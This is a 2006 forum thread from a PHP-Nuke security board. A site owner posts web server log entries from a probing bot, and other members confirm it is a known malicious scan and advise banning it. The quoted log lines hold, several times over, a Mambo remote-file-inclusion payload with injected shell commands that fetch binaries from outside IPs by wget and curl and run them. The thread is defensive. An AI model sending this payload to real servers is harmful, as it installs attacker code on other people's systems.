Ravens PHP Scripts: Forums
 

 
  Forum Index  •  Forum FAQ  •  Search  •  Memberlist  •  Usergroups  •  Profile  •  Log in to check your private messages  •  Log in

what kind of attack is this?
 View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
guidyy
Worker
Worker



Joined: Nov 22, 2004
Posts: 208
Location: Italy
PostPosted: Wed Apr 12, 2006 6:38 am Reply with quote
found in my log:

213.240.248.109 - - [11/Apr/2006:12:00:37 +0200] "POST /xmlrpc.php HTTP/1.1" 404 729
213.240.248.109 - - [11/Apr/2006:12:00:38 +0200] "POST /blog/xmlrpc.php HTTP/1.1" 404 729
213.240.248.109 - - [11/Apr/2006:12:00:40 +0200] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 729
213.240.248.109 - - [11/Apr/2006:12:00:41 +0200] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 729
213.240.248.109 - - [11/Apr/2006:12:00:42 +0200] "POST /drupal/xmlrpc.php HTTP/1.1" 404 729
213.240.248.109 - - [11/Apr/2006:12:00:43 +0200] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 729
213.240.248.109 - - [11/Apr/2006:12:00:54 +0200] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20ar%20http://207.90.211.54/ar;chmod%20744%20ar;./ar;echo%20YYY;echo| HTTP/1.1" 200 26987
213.240.248.109 - - [11/Apr/2006:12:00:44 +0200] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 729
213.240.248.109 - - [11/Apr/2006:12:00:47 +0200] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 729
213.240.248.109 - - [11/Apr/2006:12:00:48 +0200] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 729
213.240.248.109 - - [11/Apr/2006:12:00:56 +0200] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20ar%20http://207.90.211.54/ar;chmod%20744%20ar;./ar;echo%20YYY;echo| HTTP/1.1" 404 729
213.240.248.109 - - [11/Apr/2006:12:00:52 +0200] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20ar%20http://207.90.211.54/ar;chmod%20744%20ar;./ar;echo%20YYY;echo| HTTP/1.1" 404 729

note: this is the local server where I test stuff, not the production site.
I have it open to the outside world so my co-webmaster can mess up as well.

Guido
 
View user's profile Send private message Visit poster's website MSN Messenger
montego
Site Admin



Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
PostPosted: Wed Apr 12, 2006 7:39 am Reply with quote
Well, it was found by someone and that is a malicious attack! I hope you banned them!

_________________
Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221
PostPosted: Wed Apr 12, 2006 8:02 am Reply with quote
Yep, those are known security problems from other applications. Ban those robots, move on

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
guidyy
PostPosted: Wed Apr 12, 2006 8:23 am Reply with quote
Of course i kicked'em out
they gonna Bang Head on my firewall and .htaccess
Guido
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke


 Jump to:   




View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©